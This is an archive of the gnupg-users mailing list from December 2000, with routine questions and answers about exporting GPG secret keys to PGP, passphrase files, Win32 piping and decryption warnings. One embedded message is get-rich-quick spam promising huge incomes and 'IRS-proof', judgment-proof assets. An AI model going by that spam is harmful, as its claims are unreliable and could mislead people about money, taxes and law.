testet ~~~~~~ By using which software? Werner -- Archive is at http://lists.gnupg.org - Unsubscribe by sending mail with a subject of "unsubscribe" to gnupg-users-request@gnupg.org From me@dave.cx Fri Dec 8 09:23:27 2000 From: me@dave.cx (David Liu) Date: Fri, 8 Dec 2000 19:23:27 +1000 Subject: Exporting my secret key Message-ID: Hi, I'm just wondering how I would go about exporting and/or decrypting my GPG secret key for use with other PGP utilities? Thanks Dave PS: please CC me in any replies -- Archive is at http://lists.gnupg.org - Unsubscribe by sending mail with a subject of "unsubscribe" to gnupg-users-request@gnupg.org From explorer@flame.org Fri Dec 8 09:50:55 2000 From: explorer@flame.org (explorer@flame.org) Date: 8 Dec 2000 09:50:55 -0000 Subject: Cleaning bad signatures Message-ID: <20001208095055.23209.qmail@kechara.flame.org> I've started using gpg after a long no-pgp break. Way too long in fact. While I generally like gpg more than pgp 5.x under NetBSD, I have some questions. One, does --check-sig actually remove bad signatures? If not, what does? I'm getting tired of seeing warning messages on my screen. It would be a nice feature to _always_ be able to import public keys when one has the secret key. When I moved things from pgp by importing my secret ring then my public one, one key I had revoked a very long time ago was not self-signed. gpg didn't import it, which was rather annoying. It might be handy to have a --assign-ownertrust or --show-ownertrust command that will scan the public keyring, and for each key that is verified allow the ownertrust to be assigned (if not already there) and to show the values assigned. Lastly, do people see the need for a key server that allows more control over how keys are presented to the outside world? I'm considering writing one in my non-existant spare time, and even though I'm largely to blame for the existing keyserver key management, I think I can do it better if I find the time. :) Thanks, --Michael -- Archive is at http://lists.gnupg.org - Unsubscribe by sending mail with a subject of "unsubscribe" to gnupg-users-request@gnupg.org From Nils@infosun.fmi.uni-passau.de Fri Dec 8 10:02:32 2000 From: Nils@infosun.fmi.uni-passau.de (Nils Ellmenreich) Date: Fri, 8 Dec 2000 11:02:32 +0100 (CET) Subject: openPG aware gui mail clients In-Reply-To: References: <1001206123653.ZM11048@ssadler.phy.bnl.gov> <20001207.101539.59676982.sen_ml@eccosys.com> Message-ID: <14896.45496.126154.88303@barber.fmi.uni-passau.de> >>>"S" == Sascha =?iso-8859-1?q?L=FCdecke?= writes: S> The CVS gnus (version 5.8.8) has also a quite good integration of PGP S> and GPG. It is able to process S/MIME, too, though I haven't testet S> this yet. A few weeks ago, we've tested CVS Gnus. It's very promising, but not everything works yet. I've had some sig verification problem - Emacs/Mew provides the signature as a separate MIME part which Gnus could not (yet) recognize. S/MIME is more incomplete, but they're actively working on it, too, doing an excellent job. Give it a few more weeks and it should be fine. When that's the case, I'll dump VM myself and switch to Gnus. The VM maintainer hasn't yet done anything regarding an OpenPGP implementation, and MailCrypt is just not sufficient anymore. Regards, Nils -- Nils Ellmenreich, Lst. f. Programmierung, Universitaet Passau, Germany -- Archive is at http://lists.gnupg.org - Unsubscribe by sending mail with a subject of "unsubscribe" to gnupg-users-request@gnupg.org From chrender@moondock.org Fri Dec 8 10:15:07 2000 From: chrender@moondock.org (Christoph Ender) Date: Fri, 8 Dec 2000 11:15:07 +0100 (CET) Subject: Exporting my secret key In-Reply-To: Message-ID: -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 On Fri, 8 Dec 2000, David Liu wrote: > Hi, > I'm just wondering how I would go about exporting and/or decrypting my GPG > secret key for use with other PGP utilities? You can use "--export-secret-keys" for that, e.g.: gpg -a --export-secret-keys However, I run into problems when using the (german) international PGP-Freeware-Version 6.5.1: Importing Public keys from GnuPG works just fine, but when trying to import a secret key I always get "sizeAdvise-Versprechen nicht eingehalten" (Did not keep sizeAdvise-Promise). Importing secret keys generated by PGP into GnuPG works, though. Regards, Christoph. - -- Christoph Ender chrender@moondock.org http://www.moondock.org/chrender/ -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.0.4 (GNU/Linux) Comment: Weitere Infos: siehe http://www.gnupg.org iD8DBQE6MLS6AwUc0Gp3bnURApvQAJ4u7JczMIY8dCev+J1psR5sVOh4jQCgtF4I WyMhru6MQhbV8h0et4075Mk= =AKmp -----END PGP SIGNATURE----- -- Archive is at http://lists.gnupg.org - Unsubscribe by sending mail with a subject of "unsubscribe" to gnupg-users-request@gnupg.org From fw@deneb.enyo.de Fri Dec 8 10:28:31 2000 From: fw@deneb.enyo.de (Florian Weimer) Date: 08 Dec 2000 11:28:31 +0100 Subject: openPG aware gui mail clients In-Reply-To: <20001208094509.D21969@gnupg.de> References: <1001206123653.ZM11048@ssadler.phy.bnl.gov> <20001207.101539.59676982.sen_ml@eccosys.com> <20001208094509.D21969@gnupg.de> Message-ID: <87g0jz8awg.fsf@deneb.enyo.de> Werner Koch writes: > > The CVS gnus (version 5.8.8) has also a quite good integration of PGP > > and GPG. It is able to process S/MIME, too, though I haven't testet > ~~~~~~ > By using which software? OpenSSL. -- Archive is at http://lists.gnupg.org - Unsubscribe by sending mail with a subject of "unsubscribe" to gnupg-users-request@gnupg.org From wk@gnupg.org Fri Dec 8 11:48:53 2000 From: wk@gnupg.org (Werner Koch) Date: Fri, 8 Dec 2000 12:48:53 +0100 Subject: Cleaning bad signatures In-Reply-To: <20001208095055.23209.qmail@kechara.flame.org>; from explorer@flame.org on Fri, Dec 08, 2000 at 09:50:55AM -0000 References: <20001208095055.23209.qmail@kechara.flame.org> Message-ID: <20001208124853.G21969@gnupg.de> On Fri, 8 Dec 2000, explorer@flame.org wrote: > Lastly, do people see the need for a key server that allows > more control over how keys are presented to the outside world? > I'm considering writing one in my non-existant spare time, > and even though I'm largely to blame for the existing > keyserver key management, I think I can do it better if > I find the time. :) You may want to contact me in this case; I have done some minor things into the same direction but due to non existent spare time... Werner -- Archive is at http://lists.gnupg.org - Unsubscribe by sending mail with a subject of "unsubscribe" to gnupg-users-request@gnupg.org From wk@gnupg.org Fri Dec 8 11:54:44 2000 From: wk@gnupg.org (Werner Koch) Date: Fri, 8 Dec 2000 12:54:44 +0100 Subject: Cleaning bad signatures In-Reply-To: <20001208095055.23209.qmail@kechara.flame.org>; from explorer@flame.org on Fri, Dec 08, 2000 at 09:50:55AM -0000 References: <20001208095055.23209.qmail@kechara.flame.org> Message-ID: <20001208125444.I21969@gnupg.de> On Fri, 8 Dec 2000, explorer@flame.org wrote: > One, does --check-sig actually remove bad signatures? If > not, what does? I'm getting tired of seeing warning It is not possible to remove bad signatures - every import would merge them back in. Of course it would we possible to have an option to not import bad signatures - nonody has yet requested for it. > It might be handy to have a --assign-ownertrust or > --show-ownertrust command that will scan the public keyring, Yes. As soon as we will see more and more GUIs for gpg we can implement it. Werner -- Archive is at http://lists.gnupg.org - Unsubscribe by sending mail with a subject of "unsubscribe" to gnupg-users-request@gnupg.org From wk@gnupg.org Fri Dec 8 11:46:20 2000 From: wk@gnupg.org (Werner Koch) Date: Fri, 8 Dec 2000 12:46:20 +0100 Subject: Exporting my secret key In-Reply-To: ; from me@dave.cx on Fri, Dec 08, 2000 at 07:23:27PM +1000 References: Message-ID: <20001208124620.F21969@gnupg.de> On Fri, 8 Dec 2000, David Liu wrote: > I'm just wondering how I would go about exporting and/or decrypting my GPG > secret > key for use with other PGP utilities? gpg --export-secret-keys -a >foo.asc You should also export your public key; do this before you do the above. So if you want to export the key 0x12345678 do this: gpg --export -a 0x12345678 > pub+sec.asc gpg --export-secret-keys -a 0x12345678 >> pub+sec.asc Note: The forthcoming release of GnuPG does require that you use the option --allow-secret-key-import to _import_ a secret key; however it will tell you this if it sees a secret key. Werner -- Archive is at http://lists.gnupg.org - Unsubscribe by sending mail with a subject of "unsubscribe" to gnupg-users-request@gnupg.org From wk@gnupg.org Fri Dec 8 11:51:14 2000 From: wk@gnupg.org (Werner Koch) Date: Fri, 8 Dec 2000 12:51:14 +0100 Subject: Exporting my secret key In-Reply-To: ; from chrender@moondock.org on Fri, Dec 08, 2000 at 11:15:07AM +0100 References: Message-ID: <20001208125114.H21969@gnupg.de> On Fri, 8 Dec 2000, Christoph Ender wrote: > fine, but when trying to import a secret key I always get > "sizeAdvise-Versprechen nicht eingehalten" (Did not keep sizeAdvise-Promise). Huh? Someone should grep the source to tell us what this means. Werner -- Archive is at http://lists.gnupg.org - Unsubscribe by sending mail with a subject of "unsubscribe" to gnupg-users-request@gnupg.org From graham@todd276.worldonline.co.uk Fri Dec 8 12:27:19 2000 From: graham@todd276.worldonline.co.uk (Graham) Date: Fri, 08 Dec 2000 12:27:19 GMT Subject: Windows GUI (was Cleaning bad signatures) In-Reply-To: <20001208125444.I21969@gnupg.de> References: <20001208095055.23209.qmail@kechara.flame.org> <20001208125444.I21969@gnupg.de> Message-ID: <20001208122518.9701.GRAHAM@todd276.worldonline.co.uk> -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 Hi there, Werner Koch, On 08 December 2000, I received the following message from you regarding "Cleaning bad signatures" WK> Yes. As soon as we will see more and more GUIs for gpg we can WK> implement it. WK> WK> Werner Any info on the progress of the Windows GUI? Graham reply to: graham@todd276.worldonline.co.uk Please PGP/GnuPG sign mail for verification and encrypt for internet security Written on 08 December 2000 12:25:18 -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.0.4-1 (MingW32) Comment: Please use my PGP Key ID: 0x99DB10BD iD8DBQE6MNOVtwKLKus4nE4RAgXlAJ9IIIBv21IxWtCzWrcLmwq2LN4zfwCfZP9J qVvhhuKnugMr+an1HZiiSliIPwMFATow05W3Aosq6zicThECBeUAn0dW+lJWVX4s GtSSeNfLUGhMCDOMAKCTQ3RGj8bBCFbnpb0nXTPgnVDcvw== =8z/M -----END PGP SIGNATURE----- -- Archive is at http://lists.gnupg.org - Unsubscribe by sending mail with a subject of "unsubscribe" to gnupg-users-request@gnupg.org From wk@gnupg.org Fri Dec 8 12:45:27 2000 From: wk@gnupg.org (Werner Koch) Date: Fri, 8 Dec 2000 13:45:27 +0100 Subject: Windows GUI In-Reply-To: <20001208122518.9701.GRAHAM@todd276.worldonline.co.uk>; from graham@todd276.worldonline.co.uk on Fri, Dec 08, 2000 at 12:27:19PM +0000 References: <20001208095055.23209.qmail@kechara.flame.org> <20001208125444.I21969@gnupg.de> <20001208122518.9701.GRAHAM@todd276.worldonline.co.uk> Message-ID: <20001208134527.P21969@gnupg.de> On Fri, 8 Dec 2000, Graham wrote: > Any info on the progress of the Windows GUI? GPGME runs fine on windows now and Timo is going to use this in WinPT. I am currently working on the COM+ thing. Expect something before Christmas. Any VB programmers are welcome to support us as soon as the COM+ thing works. I have no clue about VB although my first professional job was related to IBM's BASIC - well, it was back in the years of a 8088. Werner -- Archive is at http://lists.gnupg.org - Unsubscribe by sending mail with a subject of "unsubscribe" to gnupg-users-request@gnupg.org From ingo@mathA.rwth-aachen.de Fri Dec 8 13:54:26 2000 From: ingo@mathA.rwth-aachen.de (Ingo Kloecker) Date: Fri, 8 Dec 2000 14:54:26 +0100 Subject: Windows GUI (was Cleaning bad signatures) In-Reply-To: <20001208122518.9701.GRAHAM@todd276.worldonline.co.uk> References: <20001208095055.23209.qmail@kechara.flame.org> <20001208125444.I21969@gnupg.de> <20001208122518.9701.GRAHAM@todd276.worldonline.co.uk> Message-ID: <00120814542604.15989@atlas> -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 On Friday, 8. December 2000 13:27, Graham wrote: > Please PGP/GnuPG sign mail for verification and encrypt for internet > security I'd like to verfiy your mail very much. But GnuPG says: gpg: can't handle these multiple signatures Regards, Ingo - -- Ingo Klöcker Lehrstuhl A für Mathematik RWTH Aachen 52056 Aachen -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.0.4 (GNU/Linux) Comment: For info see http://www.gnupg.org iD8DBQE6MOgSqUQWN/hplRsRAjEKAKCxda1hQgyYd3LGqSr7bcuasMUTkACfWB7C Zt2SGjimnGAXWjhb9JKEA78= =KLCG -----END PGP SIGNATURE----- -- Archive is at http://lists.gnupg.org - Unsubscribe by sending mail with a subject of "unsubscribe" to gnupg-users-request@gnupg.org From lhecking@nmrc.ie Fri Dec 8 14:07:18 2000 From: lhecking@nmrc.ie (Lars Hecking) Date: Fri, 8 Dec 2000 14:07:18 +0000 Subject: Windows GUI (was Cleaning bad signatures) In-Reply-To: <00120814542604.15989@atlas>; from ingo@mathA.rwth-aachen.de on Fri, Dec 08, 2000 at 02:54:26PM +0100 References: <20001208095055.23209.qmail@kechara.flame.org> <20001208125444.I21969@gnupg.de> <20001208122518.9701.GRAHAM@todd276.worldonline.co.uk> <00120814542604.15989@atlas> Message-ID: <20001208140718.A15481@nmrc.ie> Ingo Kloecker writes: > On Friday, 8. December 2000 13:27, Graham wrote: > > Please PGP/GnuPG sign mail for verification and encrypt for internet > > security > > I'd like to verfiy your mail very much. But GnuPG says: > gpg: can't handle these multiple signatures Same problem here. His mailer (Becky?) is possibly broken. -- Archive is at http://lists.gnupg.org - Unsubscribe by sending mail with a subject of "unsubscribe" to gnupg-users-request@gnupg.org From explorer@flame.org Fri Dec 8 16:56:57 2000 From: explorer@flame.org (Michael Graff) Date: 08 Dec 2000 08:56:57 -0800 Subject: Cleaning bad signatures In-Reply-To: Werner Koch's message of "Fri, 8 Dec 2000 12:54:44 +0100" References: <20001208095055.23209.qmail@kechara.flame.org> <20001208125444.I21969@gnupg.de> Message-ID: Werner Koch writes: > On Fri, 8 Dec 2000, explorer@flame.org wrote: > > > One, does --check-sig actually remove bad signatures? If > > not, what does? I'm getting tired of seeing warning > > It is not possible to remove bad signatures - every import would > merge them back in. Of course it would we possible to have an > option to not import bad signatures - nonody has yet requested for > it. I at least think it would be useful. Are they at least marked as bad in some database so they can be skipped when needed? > > It might be handy to have a --assign-ownertrust or > > --show-ownertrust command that will scan the public keyring, > > Yes. As soon as we will see more and more GUIs for gpg we can > implement it. I was going to use a combination of --list-keys and --with-colons to dump into a Perl script, but alas, that is _very_ slow. I know I should Use the Source, but does GPG cache public keys in memory rather than having to look them up constantly? Just a quick and dirty dump of the signature tree (assuming that bad signatures can be marked as such) should not take hours with under 2,000 keys. PGP is much, much worse in this area. I may start digging into the source when I can spare the time and add a few more raw file dumps, either as commands within gpg or as external tools. --Michael -- Archive is at http://lists.gnupg.org - Unsubscribe by sending mail with a subject of "unsubscribe" to gnupg-users-request@gnupg.org From rich@cnylug.org Fri Dec 8 17:45:45 2000 From: rich@cnylug.org (Rich) Date: Fri, 08 Dec 2000 12:45:45 -0500 Subject: GPGME Message-ID: <3A311E49186.20CBRICH@mail.dreamscape.com> OK, I've been reading this group for many months now, and saw a reference to GPGME for the first time (that I recall) about a week ago. I also saw is referenced to Timo and WinPT. What exactly is GPGME? Is there a link? Rich... ________________________________________ The Central New York Linux User Group Now with one of them web page thingies! www.cnylug.org <-> rich@XXXcnylug.org -- Archive is at http://lists.gnupg.org - Unsubscribe by sending mail with a subject of "unsubscribe" to gnupg-users-request@gnupg.org From rich@cnylug.org Sat Dec 9 18:47:21 2000 From: rich@cnylug.org (Rich) Date: Sat, 09 Dec 2000 13:47:21 -0500 Subject: Piping with Win32 Message-ID: <3A327E390.CEA7RICH@mail.dreamscape.com> Does piping work with GnuPG (Win32)? For example, trying to pipe the keyring list into MORE, or LESS doesn't work. But piping long directories into those utils does. Rich... ________________________________________ The Central New York Linux User Group Now with one of them web page thingies! www.cnylug.org <-> rich@XXXcnylug.org -- Archive is at http://lists.gnupg.org - Unsubscribe by sending mail with a subject of "unsubscribe" to gnupg-users-request@gnupg.org From remove@china.com Sat Dec 9 15:31:39 2000 From: remove@china.com (remove@china.com) Date: Sat, 9 Dec 2000 15:31:39 Subject: Live like the RICH Message-ID: <24.889896.792877@prodigy.com> This 2 minute message could change your LIFE ************************************************************ THIS ENTERPRISE IS AWESOMELY FEATURED IN OCTOBER 2000 MILLIONAIRE, FALL ISSUE 2000 TYCOON, AND AUGUST 2000 ENTREPRENEUR Magazine. Do you have a burning desire to change the quality of your existing life? Would you like to live the life that others only dream about? The fact is we have many people in our enterprise that earn over 50k per month from the privacy of their own home and are retiring in 2-3 years. Wealthy and having total freedom both personal and financial. READ ON! READ ON! READ ON! READ ON! READ ON! READ ON! How would you like to:(LEGALLY & LAWFULLY) 1. KEEP MOST OF YOUR TAX DOLLARS!!!!! 2. Drastically reduce personal, business and capitol gains taxes? 3. Protect all assets from any form of seizure, liens, or judgments? 4. Create a six figure income every 4 months? 5. Restoring and preserving complete personal and financial privacy? 6. Create and amass personal wealth, multiply it and protect it? 7. Realize a 3 to 6 times greater returns on your money? 8. Legally make yourself and your assets completely judgment-proof, SEIZURE-PROOOOF, LIEN-PROOOOOOF, DIVORCE-PROOOOOOF, ATTORNEY-PROOOOOOF, IRS-PROOOOOOF ((((((((((((((((((((BECOME COMPLETELY INSULATED)))))))))))))))))))))))) ((((((((((((((((((((((HELP PEOPLE DO THE SAME)))))))))))))))))))))))))) Are you a thinker, and a person that believes they deserve to have the best in life? Are you capable of recognizing a once in a lifetime opportunity when it's looking right at you? Countless others have missed their shot. Don't look back years later and wish you made the move. It's to my benefit to train you for success. In fact, I'm so sure that I can do so, I'm willing to put my money where my mouth is! Upon accepting you as a member on my team, I will provide you with complete Professional Training as well as FRESH inquiring LEADS to put you immediately on the road to success. If you are skeptical that's OK but don't let that stop you from getting all the information you need. DROP THE MOUSE AND CALL 415-273-5279 DROP THE MOUSE AND CALL *********************** 415-273-5279 ******************* -- Archive is at http://lists.gnupg.org - Unsubscribe by sending mail with a subject of "unsubscribe" to gnupg-users-request@gnupg.org From AshrafG@gtriad.com Sat Dec 9 23:55:55 2000 From: AshrafG@gtriad.com (Ashraf Gad) Date: Sat, 9 Dec 2000 18:55:55 -0500 Subject: passphrase Message-ID: <001e01c0623b$92e11170$acc01dac@gtriad.com> Can we use GPG to decrypt any file using batch mode .. i.e . I do not want to manually enter the passphrase. I need to store it in a file and pass the file name in my options. Ex : When I Encrypt my file I use : gpg.exe --output [Filename.gpg] --recipient [name] Filename.txt where : Filename.txt is my original file Filename.gpg is my encrypted file name is my key name Now When I'm decrypting my file, I need to do the following gpg.exe --output [Filename.txt] --decrypt ????? Filename.key Filename.gpg where : Filename.txt is my decrypted file Filename.gpg is my encrypted file Filename.key is my passphrase stored in a file Please CC: me in your reply as I am not subscribed. Ashraf Gad Senior Software Engineering G.Triad Tel: 212.924.8005 X 131 Fax: 212.924.8036 AshrafG@gtriad.com http://www.gtriad.com -- Archive is at http://lists.gnupg.org - Unsubscribe by sending mail with a subject of "unsubscribe" to gnupg-users-request@gnupg.org From stephan.stapel@tu-clausthal.de Sun Dec 10 00:52:52 2000 From: stephan.stapel@tu-clausthal.de (Stephan Stapel) Date: Sun, 10 Dec 2000 01:52:52 +0100 Subject: passphrase References: <001e01c0623b$92e11170$acc01dac@gtriad.com> Message-ID: <002101c06243$86aa1c00$2bf8ae8b@bert> Try this: gpg --decrypt filename.gpg --passphrase-fd 0 1> filename.txt < filename.key This means that you are piping stdout (1) to (>) filename.txt and also piping to 0 from (<) filename.key That should do the trick for you! Stephan ----- Original Message ----- From: "Ashraf Gad" To: Cc: Sent: Sunday, December 10, 2000 12:55 AM Subject: passphrase > > Can we use GPG to decrypt any file using batch mode .. i.e . I do not want > to manually enter the passphrase. I need to store it in a file and pass the > file name in my options. > > > Ex : > > When I Encrypt my file I use : > > gpg.exe --output [Filename.gpg] --recipient [name] Filename.txt > > where : Filename.txt is my original file > Filename.gpg is my encrypted file > name is my key name > > Now When I'm decrypting my file, I need to do the following > > gpg.exe --output [Filename.txt] --decrypt ????? Filename.key > Filename.gpg > > where : Filename.txt is my decrypted file > Filename.gpg is my encrypted file > Filename.key is my passphrase stored in a file > > > > Please CC: me in your reply as I am not subscribed. > > Ashraf Gad > Senior Software Engineering > G.Triad > Tel: 212.924.8005 X 131 > Fax: 212.924.8036 > AshrafG@gtriad.com > http://www.gtriad.com > > > -- > Archive is at http://lists.gnupg.org - Unsubscribe by sending mail > with a subject of "unsubscribe" to gnupg-users-request@gnupg.org > > -- Archive is at http://lists.gnupg.org - Unsubscribe by sending mail with a subject of "unsubscribe" to gnupg-users-request@gnupg.org From lists@wordit.com Sun Dec 10 06:05:31 2000 From: lists@wordit.com (Marcus) Date: Sun, 10 Dec 2000 07:05:31 +0100 Subject: Piping with Win32 In-Reply-To: <3A327E390.CEA7RICH@mail.dreamscape.com> References: <3A327E390.CEA7RICH@mail.dreamscape.com> Message-ID: <200012100705310981.00BA3FA7@smtprelay.t-online.de> On 09.12.00 at 13:47 Rich wrote: >Does piping work with GnuPG (Win32)? Partly at least. > For example, trying to pipe the keyring list into MORE, or LESS doesn't >work. But piping long directories into those utils does. What are trying to do in practice? c:\>more References: <3A327E390.CEA7RICH@mail.dreamscape.com> Message-ID: <3C14E7E1384.19B0RICH@mail.dreamscape.com> On Sun, 10 Dec 2000 07:05:31 +0100 or Thereabouts The voices in my head told me that "Marcus" said: > On 09.12.00 at 13:47 Rich wrote: > >Does piping work with GnuPG (Win32)? > > Partly at least. > > > For example, trying to pipe the keyring list into MORE, or LESS > doesn't > >work. But piping long directories into those utils does. > > What are trying to do in practice? > > c:\>more rich@XXXcnylug.org -- Archive is at http://lists.gnupg.org - Unsubscribe by sending mail with a subject of "unsubscribe" to gnupg-users-request@gnupg.org From theo.krueck@gmx.de Sun Dec 10 17:18:20 2000 From: theo.krueck@gmx.de (theo.krueck@gmx.de) Date: Sun, 10 Dec 2000 18:18:20 +0100 (MET) Subject: export secring Message-ID: <6370.976468700@www37.gmx.net> i use PGP Freeware Version 6.5.3. after i download gnupg version 1.0.4. i want to import the keys which i create with gpp. i´m able to import public-keys, which i create with gungp version 1.0.4 But, i´m not able to import private-keys, which i create with gnupg. To make an export i use the command gpg --export-secret-keys. is there a way to import private-keys in PGP Freeware Version? my OS is WIN 98 thank you in advance, theo krueck -- Sent through GMX FreeMail - http://www.gmx.net -- Archive is at http://lists.gnupg.org - Unsubscribe by sending mail with a subject of "unsubscribe" to gnupg-users-request@gnupg.org From lists@wordit.com Mon Dec 11 02:10:48 2000 From: lists@wordit.com (Marcus) Date: Mon, 11 Dec 2000 03:10:48 +0100 Subject: Piping with Win32 In-Reply-To: <3C14E7E1384.19B0RICH@mail.dreamscape.com> References: <3A327E390.CEA7RICH@mail.dreamscape.com> <3C14E7E1384.19B0RICH@mail.dreamscape.com> Message-ID: <200012110310480303.001E74AE@smtprelay.t-online.de> On 10.12.01 at 11:50 Rich wrote: > I'm trying to get my keyring list to stop after every page. Or when I >occasionally read the GPG help screen. The following reply was sent to me by private mail: "On 10.12.00 at 12:26 Jordi Negrevernis i Font wrote: >Try >gpg --list-keys | more" That is what one would expect to work. My key list is only two lines, so I can't tell if it works. I'm guessing you already tried the above? Marcus -- Archive is at http://lists.gnupg.org - Unsubscribe by sending mail with a subject of "unsubscribe" to gnupg-users-request@gnupg.org From rich@cnylug.org Mon Dec 11 02:25:58 2000 From: rich@cnylug.org (Rich) Date: Sun, 10 Dec 2000 21:25:58 -0500 Subject: Piping with Win32 In-Reply-To: References: <3C14E7E1384.19B0RICH@mail.dreamscape.com> Message-ID: <3A343B363AC.2762RICH@mail.dreamscape.com> On Mon, 11 Dec 2000 03:10:48 +0100 or Thereabouts The voices in my head told me that "Marcus" said: > "On 10.12.00 at 12:26 Jordi Negrevernis i Font wrote: > >Try > >gpg --list-keys | more" > > That is what one would expect to work. My key list is only two lines, > so I can't tell if it works. I'm guessing you already tried the above? Yes, and I'm an idiot. :-) I figured out the problem today. To save enviroment space (so my path doesn't get way out of hand) I put a directory in my path that contains batch files that I use to call many of the programs and utils that I frequently use. I was calling GPG from a batch file, and that was why it wasn't working. I simply added gnupg to my path directly (no longer using a batch file) and piping works fine now. MY FAULT. :-) Rich... ________________________________________ The Central New York Linux User Group Now with one of them web page thingies! www.cnylug.org <-> rich@XXXcnylug.org -- Archive is at http://lists.gnupg.org - Unsubscribe by sending mail with a subject of "unsubscribe" to gnupg-users-request@gnupg.org From stefan@epy.co.at Mon Dec 11 03:08:51 2000 From: stefan@epy.co.at (Stefan H. Holek) Date: Mon, 11 Dec 2000 04:08:51 +0100 (CET) Subject: export secring In-Reply-To: <6370.976468700@www37.gmx.net> Message-ID: On Sun, 10 Dec 2000 theo.krueck@gmx.de wrote: > is there a way to import private-keys in PGP Freeware Version? This is a quote I once saved: > By default, I think GnuPG encrypts your secret key using the Blowfish > symmetric algorithm. PGP will only understand 3DES, CAST5, or IDEA > symmetric algorithms. The following method works for me: > > $ gpg --s2k-cipher-algo=CAST5 --s2k-digest-algo=SHA1 --compress-algo=1 \ > --edit-key username > > then use passwd to change the password (just change it to the same > thing, but it will encrypt the key with CAST5 this time). > > Now you can export it and PGP should be able to handle it. -Todd HTH, Stefan -- Archive is at http://lists.gnupg.org - Unsubscribe by sending mail with a subject of "unsubscribe" to gnupg-users-request@gnupg.org From Peter Biechele Mon Dec 11 12:33:13 2000 From: Peter Biechele (Peter Biechele) Date: Mon, 11 Dec 2000 12:33:13 GMT Subject: Error/Warning when decrypting messages with my own key ? Message-ID: <20001211.12331300@morpheus.bextec.de> Hello ! I have a problem using gnupg 1.0.4. I have created my own key pair and have given it to somebody else. He is encrypting a file using my public key (PGP >6.5). Then I can decrypt this message using my own private key. This works fine, except that it always displays an error message like: A file encrypted by „other Company“ with the pulbic key of „Our Company“, decrypted again using the private key of „O'ur Company“: -------------------------------------- Sie benötigen ein Mantra, um den geheimen Schlüssel zu entsperren. Benutzer: "Our Company" 1024-Bit ELG-E Schlüssel, ID E06A7F65, erzeugt 2000-09-04 (Hauptschlüssel-ID A199E467) gpg: verschlüsselt mit ELG-E Schlüssel, ID A502F3A2 gpg: kein geheimer Schlüssel zur Entschlüsselung vorhanden gpg: verschlüsselt mit 3072-Bit ELG-E Schlüssel, ID 1756B1C4, erzeugt 2000-09-22 "Other Company" gpg: kein geheimer Schlüssel zur Entschlüsselung vorhanden What does it mean ??? It DOES decrypt the file, but still displays this warning/error ?? Is the encryption not correct or do we decrypt with wrong parameters or is it just a PGP/GnuPG warning ??? Thank you for any help ! Peter Biechele -- Dr. Peter Biechele Tel: +49 7641 920869 41 beXtec GmbH Fax: +49 7641 920869 49 Kaiserstuhlstr. 3, D-79312 Emmendingen E-Mail: Peter.Biechele@bextec.de HTTP : www.bextec.de -- Archive is at http://lists.gnupg.org - Unsubscribe by sending mail with a subject of "unsubscribe" to gnupg-users-request@gnupg.org From wk@gnupg.org Mon Dec 11 13:53:31 2000 From: wk@gnupg.org (Werner Koch) Date: Mon, 11 Dec 2000 14:53:31 +0100 Subject: Error/Warning when decrypting messages with my own key ? In-Reply-To: <20001211.12331300@morpheus.bextec.de>; from Peter.Biechele@bextec.de on Mon, Dec 11, 2000 at 12:33:13PM +0000 References: <20001211.12331300@morpheus.bextec.de> Message-ID: <20001211145331.C21969@gnupg.de> On Mon, 11 Dec 2000, Peter Biechele wrote: > What does it mean ??? > It DOES decrypt the file, but still displays this warning/error ?? > Is the encryption not correct or do we decrypt with wrong parameters or It just displays information about other recipients. The warning message is indeed annoying and I am looking forward to make the messages more clean. It should also display information about the key whichwas used to decrypt the message (in case you have several keypairs) Werner -- Archive is at http://lists.gnupg.org - Unsubscribe by sending mail with a subject of "unsubscribe" to gnupg-users-request@gnupg.org From jcarpenter@projectmayo.com Mon Dec 11 21:30:19 2000 From: jcarpenter@projectmayo.com (Jimmy "JimmyJames" Carpenter) Date: Mon, 11 Dec 2000 13:30:19 -0800 Subject: GPG and Java Message-ID: What facilities exist for programatically accessing GPG via Java? Even if native code is required, it would be nice to find a Java package that has already done this work and provides a simple API. I know similar things have been done for Perl and are available on CPAN. Please copy me in the reply at nawkboy@yahoo.com since I am not currently subscribed to the newsgroup. -- Archive is at http://lists.gnupg.org - Unsubscribe by sending mail with a subject of "unsubscribe" to gnupg-users-request@gnupg.org From jcarpenter@projectmayo.com Mon Dec 11 21:28:57 2000 From: jcarpenter@projectmayo.com (Jimmy "JimmyJames" Carpenter) Date: Mon, 11 Dec 2000 13:28:57 -0800 Subject: Please Message-ID: What facilities exist for programatically accessing GPG via Java? Even if native code is required, it would be nice to find a Java package that has already done this work and provides a simple API. I know similar things have been done for Perl and are available on CPAN. -- Archive is at http://lists.gnupg.org - Unsubscribe by sending mail with a subject of "unsubscribe" to gnupg-users-request@gnupg.org From Brad Allen , Brad Allen <802000207@RUMAc.UPRM.Edu> Tue Dec 12 08:12:47 2000 From: Brad Allen , Brad Allen <802000207@RUMAc.UPRM.Edu> (Brad Allen) Date: Tue, 12 Dec 2000 00:12:47 -0800 Subject: Trojan Keyboard Driver (was Re: Viewing Current Password) In-Reply-To: <3A32194C.26329.2C07D311@localhost> References: <3A32194C.26329.2C07D311@localhost> Message-ID: <20001212001247F.ulmo@komodo> This is getting off-topic misc@openbsd.org fast, but even worse is measuring typical letter keystroke seperations for typing depending on the pattern of keys typed and then using this simple time seperation technique to get a probability pattern of what the password could be. If I thought of that, then I know the NSA could have thought of even better schemes. All they need to do then is do a bit of QWERTY keyboard study and perhaps try to get some clear text or cracked samples of a target user's typing. A few minutes in a van physically would save a lot of time even if the user doesn't type the specific password wanted at that moment and NEVER uses TELNET (only unbroken SSH). I'm thinking OpenPGP implementations need something like OTP passwords or something. What is S/Key? Perhaps that, if it fits the bill ... (no repeated keystrokes) ... ah, yes it is, as described by RFC1760 (N. Haller, Bellcore, Feb. 1995); I have some concerns that the digest be strong enough (e.g., MD5 may be used by some systems, but MD5 had certain vulnerabilities which I forget; bitlength; etc.; RC4 looks to be default). I really have to read up on S/Key and choosing good hashes and bitlengths and stuff, and integration into GnuPG (cc'd to gnupg users list; cc to me but not to misc@openbsd.org please): has anybody made S/Key patches for GnuPG yet, or something even better than S/Key as described by RFC1760? This might stop even a van attack, even for those high-security GPG keys? I still want reasonable-security over-network keys right now. jim.moore> An article I saw recently described a similar technique jim.moore> used by the FBEye to capture PGP passwords being used by a jim.moore> suspected gangster. A reference to the article is provided jim.moore> below. To misc@openbsd.org --- 